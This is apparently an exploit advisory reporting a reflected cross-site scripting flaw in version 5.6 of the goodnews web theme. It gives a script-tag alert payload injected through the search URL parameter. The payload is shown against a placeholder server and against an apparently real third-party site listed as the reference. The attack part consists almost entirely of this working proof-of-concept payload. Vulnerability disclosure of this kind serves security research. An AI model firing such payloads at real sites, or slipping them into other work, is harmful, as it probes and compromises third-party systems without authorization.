# Exploit title: goodnews - v5.6 - Cross Site Scripting ( XSS ) Vulnerability
# # Date: 2018-03-19
# # Exploit Author: Elsfa7-110 ( mazoka433@gmail.com )
# # Vendor Homepage: http://www.momizat.com
# # Category: Web Application
# #
=============================
# Description:
# I discovered a XSS vulnerability in goodnews - v5.6. This vulnerability allows bad guy executes javascript commands on
# target. In this target, attacker can enter his javascript command through url. like this :
# http://Server/s=<script>alert("XSS")</script>
#=============================
# Reference:
# http://cana4g.com/?s=<script>alert("XSS")</script>